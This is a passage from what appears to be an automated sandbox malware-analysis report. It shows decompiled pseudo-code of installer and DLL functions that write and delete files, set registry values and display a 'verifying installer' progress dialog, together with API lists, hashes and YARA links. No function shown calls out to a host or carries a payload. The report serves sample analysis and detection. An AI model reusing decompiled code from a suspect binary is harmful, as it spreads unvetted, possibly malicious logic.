                                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                                                • GlobalFree.KERNEL32 ref: 00402771
                                                                • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                • String ID:
                                                                • API String ID: 3294113728-0
                                                                • Opcode ID: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                                                • Instruction ID: c2c7835655fcdbd4aa1197060f7bd229eae72b48ff88aadc8082708ad166979d
                                                                • Opcode Fuzzy Hash: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                                                • Instruction Fuzzy Hash: 9A31AD71C00128BBCF216FA5DE88DAEBA79EF04364F14423AF924762E0C67949418B99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00404E84, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00404E84(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423724; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423ff4; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BBA(0, _t39, 0x41fd10, 0x41fd10, _a4);
					}
					_t26 = lstrlenA(0x41fd10);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423708, 0x41fd10);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fd10;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd10)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd10, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                0x00404e8a
                                                                0x00404e96
                                                                0x00404e99
                                                                0x00404e9f
                                                                0x00404eab
                                                                0x00404eae
                                                                0x00404eb1
                                                                0x00404eb7
                                                                0x00404eb7
                                                                0x00404ebd
                                                                0x00404ec5
                                                                0x00404ec8
                                                                0x00404ee5
                                                                0x00404ee9
                                                                0x00404ef2
                                                                0x00404ef2
                                                                0x00404efc
                                                                0x00404f05
                                                                0x00404f11
                                                                0x00404f18
                                                                0x00404f1c
                                                                0x00404f1f
                                                                0x00404f32
                                                                0x00404f40
                                                                0x00404f40
                                                                0x00404f44
                                                                0x00404f46
                                                                0x00404f49
                                                                0x00000000
                                                                0x00404f49
                                                                0x00404eca
                                                                0x00404ed2
                                                                0x00404eda
                                                                0x00404ee0
                                                                0x00000000
                                                                0x00404ee0
                                                                0x00404eda
                                                                0x00404ec8
                                                                0x00404f53

                                                                APIs
                                                                • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                                • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                                • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                                • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                                • SendMessageA.USER32 ref: 00404F18
                                                                • SendMessageA.USER32 ref: 00404F32
                                                                • SendMessageA.USER32 ref: 00404F40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                • String ID:
                                                                • API String ID: 2531174081-0
                                                                • Opcode ID: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                                                • Instruction ID: 29716f0e6f05b21b32fe67f81276caf5577c11483a64657c7043e00463a136c9
                                                                • Opcode Fuzzy Hash: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                                                • Instruction Fuzzy Hash: 21218EB1900118BBDF119FA5DC849DFBFB9FB44354F10807AF904A6290C7789E418BA8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00404753, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00404753(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                0x00404761
                                                                0x0040476e
                                                                0x00404774
                                                                0x004047b2
                                                                0x004047b2
                                                                0x004047c1
                                                                0x004047c8
                                                                0x00000000
                                                                0x004047ca
                                                                0x00404776
                                                                0x00404785
                                                                0x0040478d
                                                                0x00404790
                                                                0x004047a2
                                                                0x004047a8
                                                                0x004047af
                                                                0x00000000
                                                                0x004047af
                                                                0x00000000

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Message$Send$ClientScreen
                                                                • String ID: f
                                                                • API String ID: 41195575-1993550816
                                                                • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                • Instruction ID: b5292072505f589c3e6e61736795eac3e8b5c463abbfbac9e5f2f3c06e421abf
                                                                • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                • Instruction Fuzzy Hash: BE015275D00219BADB00DB94DC45BFEBBBCAB55715F10412BBB10B71C1C7B465418BA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40b0d8; // 0x8200
					_t11 =  *0x41f0e8;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                0x00402b7b
                                                                0x00402b89
                                                                0x00402b8f
                                                                0x00402b8f
                                                                0x00402b9d
                                                                0x00402b9f
                                                                0x00402ba5
                                                                0x00402bac
                                                                0x00402bae
                                                                0x00402bae
                                                                0x00402bc4
                                                                0x00402bd4
                                                                0x00402be6
                                                                0x00402be6
                                                                0x00402bee

                                                                APIs
                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                                                • MulDiv.KERNEL32(00008200,00000064,?), ref: 00402BB4
                                                                • wsprintfA.USER32 ref: 00402BC4
                                                                • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                                                • SetDlgItemTextA.USER32 ref: 00402BE6
                                                                Strings
                                                                • verifying installer: %d%%, xrefs: 00402BBE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                • String ID: verifying installer: %d%%
                                                                • API String ID: 1451636040-82062127
                                                                • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                                • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                                                                • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                                • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 732218C0, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 56%
                                                                			E732218C0(intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr* _v8;
				intOrPtr _v12;

				_v8 = _a4;
				0x73220000("%p %x %p %p\n", _a4, _a8, _a12, _a16);
				if(_a16 != 0) {
					EnterCriticalSection(0x732250ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x732250ac);
						return 0xc0000bbc;
					} else {
						if( *((intOrPtr*)(_v8 + 0xc)) == 0) {
							_push(_a16);
							_push(_v8 + 0x40);
							_push(_v8 + 0x38);
							_push(_a8);
							_v12 = E73222E80(_v8);
							if(_v12 == 0) {
								 *_a16 = 0;
								if(_a12 != 0) {
									 *_a12 =  *((intOrPtr*)(_v8 + 8));
								}
							}
							LeaveCriticalSection(0x732250ac);
							return _v12;
						}
						LeaveCriticalSection(0x732250ac);
						return 0xc0000bc6;
					}
				}
				return 0xc0000bbd;
			}





                                                                0x732218c9
                                                                0x732218e1
                                                                0x732218ed
                                                                0x732218fe
                                                                0x73221908
                                                                0x7322191a
                                                                0x00000000
                                                                0x73221927
                                                                0x7322192e
                                                                0x73221945
                                                                0x7322194c
                                                                0x73221953
                                                                0x73221957
                                                                0x73221964
                                                                0x7322196b
                                                                0x73221970
                                                                0x7322197a
                                                                0x73221985
                                                                0x73221985
                                                                0x7322197a
                                                                0x7322198c
                                                                0x00000000
                                                                0x73221992
                                                                0x73221935
                                                                0x00000000
                                                                0x7322193b
                                                                0x73221908
                                                                0x00000000

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(732250AC), ref: 732218FE
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 7322191A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CriticalSection$EnterLeave
                                                                • String ID: %p %x %p %p$1HDP
                                                                • API String ID: 3168844106-2004314804
                                                                • Opcode ID: 6e66bec2f107affb7a63cf0b62a74b6fb8377d29608670224cc07270f0b66016
                                                                • Instruction ID: f389d0c3ac504226e8ba3b7c32b8956f9543bd22a0daf9ffef9f6bd519bc870f
                                                                • Opcode Fuzzy Hash: 6e66bec2f107affb7a63cf0b62a74b6fb8377d29608670224cc07270f0b66016
                                                                • Instruction Fuzzy Hash: 18217CB5600209EFEB04DF99CD44F9EBBB5AB4830AF228144F94A97241C774AEC0CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 73221570, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 58%
                                                                			E73221570(intOrPtr* _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _t18;
				intOrPtr _t19;
				signed int _t21;
				signed int* _t31;

				_v8 = _a4;
				0x73220000("%p %p\n", _a4, _a8);
				if(_a8 != 0) {
					EnterCriticalSection(0x732250ac);
					if(_v8 == 0) {
						L4:
						LeaveCriticalSection(0x732250ac);
						return 0xc0000bbc;
					}
					_t18 = _v8;
					if( *_t18 == 0x50444830) {
						0x73220000(1);
						if(_t18 == 0) {
							_t19 = E73222EB0(_t18);
							0x73220000(2, _v8);
							_v16 = _t19;
							_t21 = E73221000( *((intOrPtr*)(_v12 + 0x2c)), 0x20, 0);
							_t31 = _a8;
							 *_t31 = _t21 |  *(_v12 + 0x28);
							_t31[1] = 0;
							LeaveCriticalSection(0x732250ac);
							return 0;
						}
						LeaveCriticalSection(0x732250ac);
						return 0x800007d5;
					}
					goto L4;
				}
				return 0xc0000bbd;
			}










                                                                0x7322157a
                                                                0x7322158a
                                                                0x73221596
                                                                0x732215a7
                                                                0x732215b1
                                                                0x732215be
                                                                0x732215c3
                                                                0x00000000
                                                                0x732215c9
                                                                0x732215b3
                                                                0x732215bc
                                                                0x732215d2
                                                                0x732215dc
                                                                0x732215f4
                                                                0x732215fe
                                                                0x73221606
                                                                0x73221615
                                                                0x73221624
                                                                0x73221627
                                                                0x73221629
                                                                0x73221631
                                                                0x00000000
                                                                0x73221637
                                                                0x732215e3
                                                                0x00000000
                                                                0x732215e9
                                                                0x00000000
                                                                0x732215bc
                                                                0x00000000

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(732250AC), ref: 732215A7
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 732215C3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CriticalSection$EnterLeave
                                                                • String ID: %p %p$0HDP
                                                                • API String ID: 3168844106-1359772885
                                                                • Opcode ID: 308ac5e4bf1e8c5d9338d437680dc10295229b232df3cf8df56112c5e9d7fc28
                                                                • Instruction ID: 4b46624e2cb40fe0e4f03d6af1e489726576dd6a3633ae6512364eecc09ff957
                                                                • Opcode Fuzzy Hash: 308ac5e4bf1e8c5d9338d437680dc10295229b232df3cf8df56112c5e9d7fc28
                                                                • Instruction Fuzzy Hash: 14216DB5A00208EFE704DFA4DD04F5D7BB5AB58306F26C155FD0A9B241EB75AA80CF92
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 73221D50, Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 75%
                                                                			E73221D50(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x73220000("%p\n", _a4, __ecx);
				EnterCriticalSection(0x732250ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x732250ac);
					return 0xc0000bbc;
				} else {
					if(_a8 < 0xfffffff9 || _a8 > 7) {
						LeaveCriticalSection(0x732250ac);
						return 0xc0000bbd;
					} else {
						 *((intOrPtr*)(_v8 + 0x10)) = _a8;
						LeaveCriticalSection(0x732250ac);
						return 0;
					}
				}
			}




                                                                0x73221d57
                                                                0x73221d63
                                                                0x73221d70
                                                                0x73221d7a
                                                                0x73221d8c
                                                                0x00000000
                                                                0x73221d99
                                                                0x73221d9d
                                                                0x73221daa
                                                                0x00000000
                                                                0x73221db7
                                                                0x73221dbd
                                                                0x73221dc5
                                                                0x00000000
                                                                0x73221dcb
                                                                0x73221d9d

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(732250AC), ref: 73221D70
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73221D8C
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73221DAA
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73221DC5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CriticalSection$Leave$Enter
                                                                • String ID: %p$1HDP
                                                                • API String ID: 2978645861-1684427163
                                                                • Opcode ID: 9e776d08df75871310b1cb8c42c7b411648c8a986281981b0a545503c2ceb700
                                                                • Instruction ID: cab759071b45db53f62b72f236c71d54c669099dd2fba62dfd27b851f08f9b9c
                                                                • Opcode Fuzzy Hash: 9e776d08df75871310b1cb8c42c7b411648c8a986281981b0a545503c2ceb700
                                                                • Instruction Fuzzy Hash: 97015AB4600208EFD704DF54CD08B5CBBA0AB1821BB23C254FD598A681D778ABC0CE91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 73222440, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 28%
                                                                			E73222440(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr* _a16) {
				signed int _v8;
				WCHAR* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t31;
				void* _t58;
				void* _t60;

				_t31 = _a4;
				0x73220000(_t31, _a8, _a12, _a16);
				0x73220000("%s %d %p %p\n", _t31);
				_t60 = _t58 + 0x18;
				if(_a4 == 0) {
					if(_a12 == 0 || _a16 == 0) {
						return 0xc0000bbd;
					} else {
						if(_a8 != 0) {
							_v8 = 0;
							while(1) {
								0x73220000(0x73224180);
								_t60 = _t60 + 4;
								if(_v8 >= _t31) {
									break;
								}
								_t14 = (_v8 << 5) + 0x73224180; // 0x6
								_t31 =  *_t14;
								if(_t31 != _a8) {
									_v8 = _v8 + 1;
									continue;
								}
								_t17 = (_v8 << 5) + 0x73224184; // 0x732263a8
								_v12 =  &((wcsrchr( *_t17, 0x5c))[0]);
								_v16 = lstrlenW(_v12) + 1;
								if( *_a16 >= _v16) {
									lstrcpyW(_a12, _v12);
									_v20 = 0;
								} else {
									_v20 = 0x800007d2;
								}
								 *_a16 = _v16;
								return _v20;
							}
							return 0xc0000bbd;
						}
						return 0;
					}
				}
				0x73220000("remote machine not supported\n");
				return 0x800007d0;
			}










                                                                0x73222452
                                                                0x73222456
                                                                0x73222464
                                                                0x73222469
                                                                0x73222470
                                                                0x7322248d
                                                                0x00000000
                                                                0x7322249f
                                                                0x732224a3
                                                                0x732224ac
                                                                0x732224be
                                                                0x732224c3
                                                                0x732224c8
                                                                0x732224ce
                                                                0x00000000
                                                                0x00000000
                                                                0x732224d6
                                                                0x732224d6
                                                                0x732224df
                                                                0x732224bb
                                                                0x00000000
                                                                0x732224bb
                                                                0x732224e9
                                                                0x732224fc
                                                                0x7322250c
                                                                0x73222517
                                                                0x7322252a
                                                                0x73222530
                                                                0x73222519
                                                                0x73222519
                                                                0x73222519
                                                                0x7322253d
                                                                0x00000000
                                                                0x7322253f
                                                                0x00000000
                                                                0x73222549
                                                                0x00000000
                                                                0x732224a5
                                                                0x7322248d
                                                                0x73222477
                                                                0x00000000

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s %d %p %p$remote machine not supported
                                                                • API String ID: 0-1546047983
                                                                • Opcode ID: bd9d636b0319c4eccce429ece40c38cd75199d2620255781a3236a4e8f4bec52
                                                                • Instruction ID: 3c564516f9fe5377899ad3861706fc8ea3db8714b6952e1f61ddcd88559ad654
                                                                • Opcode Fuzzy Hash: bd9d636b0319c4eccce429ece40c38cd75199d2620255781a3236a4e8f4bec52
                                                                • Instruction Fuzzy Hash: CB3181B1A0020DEFDB44CF98DC44B9E7B79FB44306F128155E815AB345D379AA90CF92
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 85%
                                                                			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				_t30 =  *0x423ff0; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a410) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a410 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a410, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a410, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423fc8 =  *0x423fc8 +  *(_t37 - 4);
				return 0;
			}











                                                                0x00402337
                                                                0x0040233c
                                                                0x00402346
                                                                0x00402350
                                                                0x00402353
                                                                0x0040235d
                                                                0x0040236d
                                                                0x00402374
                                                                0x0040237c
                                                                0x0040238a
                                                                0x0040238e
                                                                0x00402399
                                                                0x00402399
                                                                0x0040239d
                                                                0x004023a1
                                                                0x004023a7
                                                                0x004023ac
                                                                0x004023ac
                                                                0x004023b0
                                                                0x004023bc
                                                                0x004023bc
                                                                0x004023d5
                                                                0x004023d7
                                                                0x004023d7
                                                                0x004023da
                                                                0x004024b0
                                                                0x004024b0
                                                                0x004028c1
                                                                0x004028cd

                                                                APIs
                                                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nspE59E.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                                                • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nspE59E.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nspE59E.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CloseCreateValuelstrlen
                                                                • String ID: C:\Users\user\AppData\Local\Temp\nspE59E.tmp
                                                                • API String ID: 1356686001-3584114962
                                                                • Opcode ID: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                                                • Instruction ID: e6eb4e552242eddf296ff96e6d07a7eb6613d299afeb9756830ee7ce8f9eb162
                                                                • Opcode Fuzzy Hash: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                                                • Instruction Fuzzy Hash: 7111A271E00108BFEB10EFA5DE8DEAF7678EB40758F10443AF505B31D0C6B85D419A69
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 84%
                                                                			E00402A69(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423ff0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A69(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F28(4);
					if(_t27 == 0) {
						__eflags =  *0x423ff0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
